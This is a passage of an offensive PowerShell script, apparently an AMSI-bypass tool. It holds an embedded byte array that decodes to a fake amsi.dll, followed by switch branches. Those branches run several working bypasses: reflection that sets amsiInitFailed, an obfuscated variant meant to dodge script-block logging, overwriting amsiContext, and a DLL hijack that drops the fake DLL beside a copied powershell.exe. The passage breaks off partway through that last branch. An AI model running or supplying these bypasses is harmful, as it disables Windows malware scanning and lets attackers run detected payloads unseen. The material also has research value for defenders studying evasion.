0 0 0 255 224 64 85 72 131 236 32 72 139 234 138 77 64 72 131 196 32 93 233 4 250 255 255 204 64 85 72 131 236 32 72 139 234 232 45 248 255 255 138 77 56 72 131 196 32 93 233 232 249 255 255 204 64 85 72 131 236 48 72 139 234 72 139 1 139 16 72 137 76 36 40 137 84 36 32 76 141 13 161 241 255 255 76 139 69 112 139 85 104 72 139 77 96 232 93 247 255 255 144 72 131 196 48 93 195 204 64 85 72 139 234 72 139 1 51 201 129 56 5 0 0 192 15 148 193 139 193 93 195 204 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 106 41 0 0 0 0 0 0 86 41 0 0 0 0 0 0 60 41 0 0 0 0 0 0 40 41 0 0 0 0 0 0 164 41 0 0 0 0 0 0 94 42 0 0 0 0 0 0 72 42 0 0 0 0 0 0 46 42 0 0 0 0 0 0 24 42 0 0 0 0 0 0 2 42 0 0 0 0 0 0 232 41 0 0 0 0 0 0 204 41 0 0 0 0 0 0 184 41 0 0 0 0 0 0 134 41 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 40 0 0 0 0 0 0 20 40 0 0 0 0 0 0 252 39 0 0 0 0 0 0 218 39 0 0 0 0 0 0 184 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 252 40 0 0 0 0 0 0 238 40 0 0 0 0 0 0 214 40 0 0 0 0 0 0 186 40 0 0 0 0 0 0 158 40 0 0 0 0 0 0 124 40 0 0 0 0 0 0 106 40 0 0 0 0 0 0 92 40 0 0 0 0 0 0 80 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 216 29 0 128 1 0 0 0 80 30 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 48 0 128 1 0 0 0 240 48 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 136 29 62 87 0 0 0 0 2 0 0 0 65 0 0 0 116 34 0 0 116 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 12 0 0 0 20 0 0 0 184 34 0 0 184 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 13 0 0 0 68 2 0 0 204 34 0 0 204 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 48 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 32 0 128 1 0 0 0 0 33 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 82 83 68 83 42 80 223 113 29 247 64 69 188 37 18 40 145 144 25 190 50 0 0 0 67 58 92 68 101 118 101 108 111 112 109 101 110 116 92 65 109 115 105 92 120 54 52 92 82 101 108 101 97 115 101 92 65 109 115 105 46 112 100 98 0 0 0 0 0 0 0 0 18 0 0 0 18 0 0 0 1 0 0 0 17 0 0 0 71 67 84 76 0 16 0 0 63 14 0 0 46 116 101 120 
116 36 109 110 0 0 0 0 64 30 0 0 18 0 0 0 46 116 101 120 116 36 109 110 36 48 48 0 82 30 0 0 129 0 0 0 46 116 101 120 116 36 120 0 0 32 0 0 248 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 248 32 0 0 16 0 0 0 46 48 48 99 102 103 0 0 8 33 0 0 8 0 0 0 46 67 82 84 36 88 67 65 0 0 0 0 16 33 0 0 8 0 0 0 46 67 82 84 36 88 67 90 0 0 0 0 24 33 0 0 8 0 0 0 46 67 82 84 36 88 73 65 0 0 0 0 32 33 0 0 8 0 0 0 46 67 82 84 36 88 73 90 0 0 0 0 40 33 0 0 8 0 0 0 46 67 82 84 36 88 80 65 0 0 0 0 48 33 0 0 8 0 0 0 46 67 82 84 36 88 80 90 0 0 0 0 56 33 0 0 8 0 0 0 46 67 82 84 36 88 84 65 0 0 0 0 64 33 0 0 8 0 0 0 46 67 82 84 36 88 84 90 0 0 0 0 80 33 0 0 36 1 0 0 46 114 100 97 116 97 0 0 116 34 0 0 156 2 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 16 37 0 0 8 0 0 0 46 114 116 99 36 73 65 65 0 0 0 0 24 37 0 0 8 0 0 0 46 114 116 99 36 73 90 90 0 0 0 0 32 37 0 0 8 0 0 0 46 114 116 99 36 84 65 65 0 0 0 0 40 37 0 0 8 0 0 0 46 114 116 99 36 84 90 90 0 0 0 0 48 37 0 0 60 1 0 0 46 120 100 97 116 97 0 0 108 38 0 0 60 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 168 38 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 192 38 0 0 248 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 184 39 0 0 200 2 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 52 0 0 0 46 100 97 116 97 0 0 0 64 48 0 0 0 6 0 0 46 98 115 115 0 0 0 0 0 64 0 0 176 1 0 0 46 112 100 97 116 97 0 0 0 80 0 0 16 0 0 0 46 103 102 105 100 115 36 121 0 0 0 0 0 96 0 0 88 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 96 96 0 0 128 1 0 0 46 114 115 114 99 36 48 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 17 21 8 0 21 116 9 0 21 100 7 0 21 52 6 0 21 50 17 224 236 29 0 0 1 0 0 0 207 16 0 0 92 17 0 0 82 30 0 0 0 0 0 0 17 15 6 0 15 100 8 0 15 52 6 0 15 50 11 112 236 29 0 0 1 0 0 0 246 17 0 0 20 18 0 0 105 30 0 0 0 0 0 0 1 6 2 0 6 50 2 80 1 20 8 0 20 100 8 0 20 84 7 0 20 52 6 0 20 50 16 112 9 26 6 0 26 52 15 0 26 114 22 224 20 112 19 96 236 29 0 0 1 0 0 0 102 18 0 0 54 19 0 0 133 30 0 0 54 19 0 0 1 6 2 0 6 82 2 80 1 9 1 
0 9 98 0 0 1 8 4 0 8 114 4 112 3 96 2 48 9 4 1 0 4 34 0 0 236 29 0 0 1 0 0 0 215 23 0 0 101 24 0 0 187 30 0 0 101 24 0 0 1 2 1 0 2 80 0 0 1 4 1 0 4 66 0 0 1 6 2 0 6 50 2 48 1 13 4 0 13 52 10 0 13 114 6 80 1 13 4 0 13 52 9 0 13 50 6 80 1 21 5 0 21 52 186 0 21 1 184 0 6 80 0 0 1 15 6 0 15 100 7 0 15 52 6 0 15 50 11 112 1 13 4 0 13 52 7 0 13 50 6 80 0 0 0 0 1 0 0 0 56 39 0 0 0 0 0 0 0 0 0 0 62 40 0 0 120 32 0 0 104 39 0 0 0 0 0 0 0 0 0 0 6 41 0 0 168 32 0 0 192 38 0 0 0 0 0 0 0 0 0 0 114 42 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 106 41 0 0 0 0 0 0 86 41 0 0 0 0 0 0 60 41 0 0 0 0 0 0 40 41 0 0 0 0 0 0 164 41 0 0 0 0 0 0 94 42 0 0 0 0 0 0 72 42 0 0 0 0 0 0 46 42 0 0 0 0 0 0 24 42 0 0 0 0 0 0 2 42 0 0 0 0 0 0 232 41 0 0 0 0 0 0 204 41 0 0 0 0 0 0 184 41 0 0 0 0 0 0 134 41 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 40 0 0 0 0 0 0 20 40 0 0 0 0 0 0 252 39 0 0 0 0 0 0 218 39 0 0 0 0 0 0 184 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 252 40 0 0 0 0 0 0 238 40 0 0 0 0 0 0 214 40 0 0 0 0 0 0 186 40 0 0 0 0 0 0 158 40 0 0 0 0 0 0 124 40 0 0 0 0 0 0 106 40 0 0 0 0 0 0 92 40 0 0 0 0 0 0 80 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 40 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 105 110 118 111 107 101 95 116 114 105 103 103 101 114 0 41 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 114 101 116 117 114 110 95 116 114 105 103 103 101 114 0 8 0 95 95 67 95 115 112 101 99 105 102 105 99 95 104 97 110 100 108 101 114 0 0 37 0 95 95 115 116 100 95 116 121 112 101 95 105 110 102 111 95 100 101 115 116 114 111 121 95 108 105 115 116 0 0 62 0 109 101 109 115 101 116 0 0 86 67 82 85 78 84 73 77 69 49 52 48 46 100 108 108 0 0 54 0 95 105 110 105 116 116 101 114 109 0 55 0 95 105 110 105 116 116 101 114 109 95 101 0 63 0 95 115 101 104 95 102 105 108 116 101 114 95 100 108 108 0 51 0 95 105 110 105 116 105 97 108 105 122 101 95 110 97 114 114 111 119 95 101 110 118 105 114 111 110 109 101 110 116 0 0 52 0 95 105 110 105 116 105 97 108 105 122 101 95 111 110 101 120 
105 116 95 116 97 98 108 101 0 0 60 0 95 114 101 103 105 115 116 101 114 95 111 110 101 120 105 116 95 102 117 110 99 116 105 111 110 0 34 0 95 101 120 101 99 117 116 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 30 0 95 99 114 116 95 97 116 101 120 105 116 0 22 0 95 99 101 120 105 116 0 0 97 112 105 45 109 115 45 119 105 110 45 99 114 116 45 114 117 110 116 105 109 101 45 108 49 45 49 45 48 46 100 108 108 0 174 4 82 116 108 67 97 112 116 117 114 101 67 111 110 116 101 120 116 0 181 4 82 116 108 76 111 111 107 117 112 70 117 110 99 116 105 111 110 69 110 116 114 121 0 0 188 4 82 116 108 86 105 114 116 117 97 108 85 110 119 105 110 100 0 0 146 5 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 0 82 5 83 101 116 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 15 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 0 112 5 84 101 114 109 105 110 97 116 101 80 114 111 99 101 115 115 0 0 112 3 73 115 80 114 111 99 101 115 115 111 114 70 101 97 116 117 114 101 80 114 101 115 101 110 116 0 48 4 81 117 101 114 121 80 101 114 102 111 114 109 97 110 99 101 67 111 117 110 116 101 114 0 16 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 73 100 0 20 2 71 101 116 67 117 114 114 101 110 116 84 104 114 101 97 100 73 100 0 0 221 2 71 101 116 83 121 115 116 101 109 84 105 109 101 65 115 70 105 108 101 84 105 109 101 0 84 3 73 110 105 116 105 97 108 105 122 101 83 76 105 115 116 72 101 97 100 0 106 3 73 115 68 101 98 117 103 103 101 114 80 114 101 115 101 110 116 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 50 162 223 45 153 43 0 0 205 93 32 210 102 212 255 255 255 255 255 255 0 0 0 0 1 0 0 0 2 0 0 0 47 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 16 0 0 65 16 0 0 48 37 0 0 68 16 0 0 148 16 0 0 16 38 0 0 148 16 0 0 191 17 0 0 52 37 0 0 192 17 0 0 66 18 0 0 96 37 0 0 68 18 0 0 76 19 0 0 164 37 0 0 76 19 0 0 160 19 0 0 144 37 0 0 160 19 0 0 221 19 0 0 72 38 0 0 224 19 0 0 20 20 0 0 24 38 0 0 20 20 0 0 229 20 0 0 212 37 0 0 232 20 0 0 89 21 0 0 220 37 0 0 92 21 0 0 149 21 0 0 16 38 0 0 152 21 0 0 184 21 0 0 16 38 0 0 184 21 0 0 205 21 0 0 16 38 0 0 208 21 0 0 248 21 0 0 16 38 0 0 248 21 0 0 13 22 0 0 16 38 0 0 16 22 0 0 113 22 0 0 144 37 0 0 116 22 0 0 164 22 0 0 16 38 
0 0 164 22 0 0 184 22 0 0 16 38 0 0 184 22 0 0 1 23 0 0 24 38 0 0 4 23 0 0 205 23 0 0 32 38 0 0 208 23 0 0 108 24 0 0 232 37 0 0 108 24 0 0 144 24 0 0 24 38 0 0 144 24 0 0 187 24 0 0 24 38 0 0 188 24 0 0 11 25 0 0 24 38 0 0 12 25 0 0 35 25 0 0 16 38 0 0 36 25 0 0 208 25 0 0 44 38 0 0 252 25 0 0 23 26 0 0 16 38 0 0 32 26 0 0 101 27 0 0 56 38 0 0 104 27 0 0 178 27 0 0 72 38 0 0 180 27 0 0 254 27 0 0 72 38 0 0 8 28 0 0 201 29 0 0 88 38 0 0 80 30 0 0 82 30 0 0 104 38 0 0 82 30 0 0 105 30 0 0 136 37 0 0 105 30 0 0 133 30 0 0 136 37 0 0 133 30 0 0 187 30 0 0 204 37 0 0 187 30 0 0 211 30 0 0 8 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 54 0 0 0 73 0 0 0 76 0 0 0 11 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 24 0 0 0 24 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 72 0 0 0 96 96 0 0 125 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 60 63 
120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 24 0 0 0 248 160 0 161 88 161 96 161 56 162 80 162 88 162 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + + if (([IntPtr]::Size) -eq 8) + { + Write-Verbose "64 bit process detected." + $DllBytes = $AmsiX64 + } + elseif (([IntPtr]::Size) -eq 4) + { + Write-Verbose "32 bit process detected." + $DllBytes = $AmsiX86 + } + + switch($method) + { + + "unload" + { + Write-Verbose "Using Matt Graeber's Reflection method." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)' + } + else + { + Write-Output "Executing the bypass." + [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) + } + } + + "unloadsilent" + { + Write-Verbose "Using Matt Graeber's Reflection method with WMF5 autologging bypass." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." 
+ Write-Output '[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags'')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType(''System.T''+''ype'')), [Object]([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'')),(''GetFie''+''ld'')).Invoke(''amsiInitFailed'',((''Non''+''Public,Static'') -as [String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags''))).SetValue($null,$True)' + } + else + { + Write-Output "Executing the bypass." + [Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True) + } + } + + "unloadobfuscated" + { + Write-Verbose "Using Matt Graeber's Reflection method with obfuscation from Daneil Bohannon's Invoke-Obfuscation - which bypasses WMF5 autologging." + if ($ShowOnly -eq $True) + { + $code = @" +Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)]) +"@ + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output $code + } + else + { + Write-Output "Executing the bypass." 
+ Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)]) + + } + } + + "unload2" + { + Write-Verbose "Using Matt Graeber's second Reflection method." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiContext'',[Reflection.BindingFlags]''NonPublic,Static'').GetValue($null),0x41414141)' + } + else + { + Write-Output "Executing the bypass." + [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) + } + } + + "dllhijack" + { + Write-Verbose "Using Cornelis de Plaa's DLL hijack method." + if ($ShowOnly -eq $True) + { + Write-Output "Copy powershell.exe from C:\Windows\System32\WindowsPowershell\v1.0 to a local folder and dropa fake amsi.dll in the same directory." + Write-Output "Run the new powershell.exe and AMSI should be gone for that session." + } + else + { + [Byte[]] $temp = $DllBytes -split ' ' + Write-Output "Executing the bypass." + Write-Verbose "Dropping the fake amsi.dll to disk." + [System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp) + + Write-Verbose "Copying powershell.exe to the current working directory." + Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd + + Write-Verbose "Starting powershell.exe from the current working directory." 
